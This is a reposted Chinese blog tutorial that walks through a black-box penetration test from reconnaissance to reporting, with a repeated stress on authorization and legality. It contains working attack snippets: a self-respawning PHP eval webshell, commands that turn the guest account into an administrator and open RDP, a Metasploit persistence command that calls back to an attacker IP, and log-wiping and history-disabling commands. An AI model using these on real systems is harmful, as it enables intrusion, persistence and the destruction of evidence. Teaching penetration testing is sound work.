本文轉載，如有冒犯，聯系本人立即刪除

目錄

滲透測試

信息收集

漏洞探測

漏洞利用

內網轉發

內網滲透

痕跡清除

撰寫滲透測試保告

---

滲透測試

滲透測試就是利用我們所掌握的滲透知識，對網站進行一步一步的滲透，發現其中存在的漏洞和隱藏的風險，然后撰寫一篇測試報告，提供給我們的客戶。客戶根據我們撰寫的測試報告，對網站進行漏洞修補，以防止黑客的入侵！

滲透測試的前提是我們得經過用戶的授權，才可以對網站進行滲透。如果我們沒有經過客戶的授權而對一個網站進行滲透測試的話，這是違法的。去年的6.1日我國頒布了《網絡安全法》，對網絡犯罪有了法律約束，不懂的移步——>?網絡安全法

滲透測試分為 白盒測試 和 黑盒測試

• 白盒測試就是在知道目標網站源碼和其他一些信息的情況下對其進行滲透，有點類似于代碼分析
• 黑盒測試就是只告訴我們這個網站的url，其他什么都不告訴，然后讓你去滲透，模擬黑客對網站的滲透

我們現在就模擬黑客對一個網站進行滲透測試，這屬于黑盒測試，我們只知道該網站的URL，其他什么的信息都不知道。

接下來，我就給大家分享下黑盒滲透測試的流程和思路！

當我們確定好了一個目標進行滲透之后，第一步該做的是什么呢？

信息收集

第一步做的就是信息收集，正所謂知己知彼百戰百勝，我們根據網站URL可以查出一系列關于該網站的信息。通過URL我們可以查到該網站的IP、該網站操作系統、腳本語言、在該服務器上是否還有其他網站等等一些列的信息。更多的關于信息收集，我在另一篇文章中很詳細的介紹了信息收集需要收集哪些信息，以及信息收集過程中需要用到的工具，傳送門——>?滲透測試之信息收集

漏洞探測

當我們收集到了足夠多的信息之后，我們就要開始對網站進行漏洞探測了。探測網站是否存在一些常見的Web漏洞，比如：

• SQL注入? ? ， 傳送門——>SQL注入詳解
• XSS跨站腳本? ，傳送門——>XSS(跨站腳本)漏洞詳解
• CSRF跨站請求偽造? ,? 傳送門——>CSRF跨站請求偽造攻擊
• XXE漏洞，傳送門——>XXE(XML外部實體注入)漏洞
• SSRF服務端請求偽造漏洞，傳送門——>SSRF(服務端請求偽造)漏洞
• 文件包含漏洞? ,? 傳送門——>文件包含漏洞
• 文件上傳漏洞 ,?傳送門——>文件上傳漏洞
• 文件解析漏洞，傳送門——>文件解析漏洞
• 遠程代碼執行漏洞 ,?傳送門——>?遠程代碼執行漏洞
• CORS跨域資源共享漏洞，傳送門——>CORS跨域資源共享漏洞
• 越權訪問漏洞，傳送門——>越權訪問漏洞
• 目錄瀏覽漏洞和任意文件讀取/下載漏洞，傳送門——>目錄瀏覽漏洞和任意文件讀取/下載漏洞
• struts2漏洞，傳送門——>Struts2漏洞
• JAVA反序列化漏洞，傳送門——>JAVA反序列化漏洞

這些是網站經常發現的一些漏洞，還有一些網站漏洞，這里我就不一一列舉出來了。

網站漏洞掃描工具也有很多，比如：

• AWVS? ，傳送門——>?AWVS掃描器的用法
• AppScan ，傳送門——>?AppScan掃描器的用法
• Owasp-Zap?，傳送門——>?OWASP-ZAP掃描器的使用
• Nessus?，傳送門——>?Nessus掃描器的使用

網站漏洞掃描工具我就列舉這幾種，還有很多，最常用的是這幾個！

漏洞利用

當我們探測到了該網站存在漏洞之后，我們就要對該漏洞進行利用了。不同的漏洞有不同的利用工具，很多時候，通過一個漏洞我們很難拿到網站的webshell，我們往往需要結合幾個漏洞來拿webshell。常用的漏洞利用工具如下：

SQL注入 ，?傳送門——>?Sqlmap的使用

XSS跨站腳本，傳送門——>?Beef-XSS的使用

抓包改包工具，——>?Burpsuite工具的使用? 、??Fidder抓包軟件的使用

文件上傳漏洞，上傳漏洞的話，我們一般會上傳一句話木馬上去，進而再獲得webshell，傳送門——>?Webshell和一句話木馬

但是，獲得了webshell后，一般權限很低，所以我們需要提權，可以選擇反彈一個MSF類型的shell提權：Metasploit Framework(MSF)的使用? 、 Msfvenonm生成一個后門木馬，也可以反彈一個CobaltStrike類型的shell：滲透測試神器Cobalt Strike的使用，?也可以MSF和CobaltStrike聯動：MSF和CobaltStrike聯動?也可以使用其他提權：Windows提權?、?Linux提權

內網轉發

當我們獲取到了網站的Webshell之后，如果我們想獲取該主機的有關信息，我們可以將該主機的webshell換成MSF的shell。直接生成一個木馬，然后在菜刀中執行該木馬，我們就能接收到一個MSF類型的shell了。

如果我們還想進一步的探測內網主機的信息的話，我們就需要進行內網轉發了。我們是不能直接和內網的主機通信的，所以我們就需要借助獲取到的webshell網站的服務器和內網主機進行通信。

• 內網轉發?
• 內網轉發隨想?
• 內網穿透工具FRP的使用

內網橫向滲透

當我們在獲取了外網服務器的權限，進入該系統后，我們要想盡辦法從該服務器上查找到我們想要的信息。

對于windows主機，我們應該多去翻翻目錄，或許能有很多意想不到的結果。很多人習慣把賬號密碼等容易忘的東西存放在備忘錄中，或者是桌面上。我們還可以查找數據庫的連接文件，查看數據庫的連接賬號密碼等敏感信息。當我們獲得了windows主機的賬號密碼，或者是自己創建了新用戶后，我們為了不被網站管理員發現和不破壞服務器。我們盡量不要使用遠程桌面。因為使用遠程桌面動靜比較大，如果此時服務器管理員也在登錄，而你此時通過遠程桌面登錄的話，會將管理員擠掉，而你也將很快的被管理員踢掉。對于實在是要遠程桌面登錄的情況的話，我們盡量不要新建一個用戶進行登錄。我們可以激活??guest 用戶，然后將其加入 administrators 組里面，用 guest 用戶身份登錄。在RDP遠程登錄后，我們可以查看其他用戶桌面上和其他目錄有哪些軟件，我們要找的目標有以下。

• FTP相關的軟件
• 數據庫相關的軟件
• 打開瀏覽器，查看歷史記錄，查看某些網站是否保存有用戶密碼。利用工具查看瀏覽器保存的密碼

從該主機上找到的賬號密碼，我們可以做一個字典，在對內網其他機器進行爆破的時候，很有可能是同密碼。

net user guest /active:yes #激活guest用戶

net localgroup administrators guest /add #將guest用戶添加到

net user guest 密碼 #更改guest用戶密碼

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f #開啟3389端口

對于Linux主機，我們可以查看開放的端口號，開放的服務，與其建立連接的內網主機。查看目錄，查找網站數據庫連接密碼?？傊?#xff0c;就是盡可能的多查找一些賬號密碼，這對于內網的賬號爆破非常有用。

在搭建了隧道可以通內網后，我們首先就需要對內網進行資產發現了。但是對于內網存活網段的判斷是一個大問題。內網很有可能同時存在 10.0.0.0/8、172.16.0.0/16、192.168.0.0/24?網段。這就需要我們用掃描器對其進行探測了。通過代理進行內網掃描不建議使用nmap。如果是在本地主機通過代理掃描，可以圖形化界面的話，可以使用 RouterScan 、御劍高速TCP全端口掃描器、IIS_Scanner。但是注意線程調低一點，不然代理很容易崩了。如果使用命令行掃描器的話，可以使用S掃描器。在掃描了內網資產和端口開放情況后，對于445端口，就可以打一波MS17_010。但是注意通過代理打445，和之前的是不一樣的。傳送門——>?內網滲透之MS17-010?。對于3389端口，可以打一波CVE-2019-0708，傳送門——>?CVE-2019-0708 遠程桌面漏洞復現?。對于1433/3306/6379等端口，可以嘗試爆破，利用之前收集到的賬號密碼成功率更高哦。

關于內網滲透(域環境和非域環境)：內網滲透

內網的橫向滲透MSF比較好用：

• 后滲透階段之基于MSF的路由轉發
• 后滲透階段之基于MSF的內網主機探測

內網滲透的ICMP和DNS隧道搭建：

• 利用DNS進行命令控制和搭建隧道
• 利用ICMP進行命令控制和隧道傳輸

相關文章：內網滲透測試之域滲透詳解！

? ? ? ? ? ? ? ? ??內網滲透中mimikatz的使用

權限維持

在拿到目標主機的權限后，很有可能當時我們并不能獲取到想要的東西，需要進行長期的潛伏，特別是在內網滲透中，需要進行長期的信息收集。這時，權限維持就很重要了。我們需要維持住獲得的現有權限。

Web后門

1：隱藏后門文件(將文件設置為隱藏)

2：不死馬，該腳本每5秒向服務器創建test.php，并寫入一句話免殺木馬。結合attrib命令隱藏文件更好地建立后門。

<?php

set_time_limit(0);//程序執行時間

ignore_user_abort(1);//關掉終端后腳本仍然運行

unlink(__FILE__);//文件完整名

while(1){

file_put_contents('test.php','<?php $a=array($_REQUEST["x"]=>"3");

$b=array_keys($a)[0];

eval($b);?>');

sleep(5);

}

?>

3：?404頁面隱藏后門，或者在其他自帶文件中插入后門代碼

注：以上幾種后門方法均能被D盾等工具檢測到

Windows系統

1：建立隱藏用戶，在用戶名后加 $?

2：在開機啟動目錄下放置木馬文件，只要目標機器重啟，將回連我們的遠控

3：MSF里的 persistence 模塊，執行命令可以使目標機器每隔一定時間自動回連遠控。但是容易被發現

#反彈時間間隔是5s?會自動連接192.168.27的4444端口，缺點是容易被殺毒軟件查殺

run persistence -X -i 5 -p 8888 -r 192.168.10.27

#然后它就在目標機新建了這個文件：C:\Windows\TEMP\CJzhFlNOWa.vbs ，并把該服務加入了注冊表中，只要開機就會啟動

4：在域環境下，想辦法獲得 krbtgt 用戶的哈希，該用戶的哈希可以進行票據傳遞攻擊。而且一般該用戶的密碼不經常改變。

5：shift后門

6：遠程桌面會話劫持?

Linux系統

1：SSH后門

2：crontab定時任務

3：SSH公鑰

4：創建SUID=0的用戶

痕跡清除

當我們達到了目的之后，有時候只是為了黑入網站掛黑頁，炫耀一下；或者在網站留下一個后門，作為肉雞，沒事的時候上去溜達溜達；亦或者掛入挖礦木馬；但是大家千萬不要干這些事，這些都是違法的！

我這里只是教大家在滲透進去之后如何清除我們留下的一部分痕跡，并不能完全清除，完全清除入侵痕跡是不可能的！主要是增加管理員發現入侵者的時間成本和人力成本。只要管理員想查，無論你怎么清除，還是能查到的。

最主要還是要以隱藏自身身份為主，最好的手段是在滲透前掛上代理，然后在滲透后痕跡清除。

Windows系統

1：如果是windows系統，可用MSF中的 clearev 命令清除痕跡

2：如果3389遠程登錄過，需要清除mstsc痕跡

3：執行命令清除日志：

del %WINDR%\* .log /a/s/q/f

4：如果是web應用，找到web日志文件，刪除?

相關文章：WINDOWS之入侵痕跡清理總結

Linux系統

1：如果是Linux系統，在獲取權限后，執行以下命令，不會記錄輸入過的命令

export HISTFILE=/dev/null export HISTSIZE=0

2：刪除 /var/log 目錄下的日志文件

3：如果是web應用，找到web日志文件，刪除?

撰寫滲透測試保告

在完成了滲透測試之后，我們就需要對這次滲透測試撰寫滲透測試報告了。明確的寫出哪里存在漏洞，以及漏洞修補的方法。以便于網站管理員根據我們的滲透測試報告修補這些漏洞和風險，防止被黑客攻擊！

我們做的這一切的一切都是為了營造一個更安全更可信任的網絡環境，大家切記不要利用本篇文章進行違法犯罪行為！

未完待續。。。。。。

相關文章：紅藍對抗經驗小結

總結

以上是生活随笔為你收集整理的一次完整的渗透测试的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。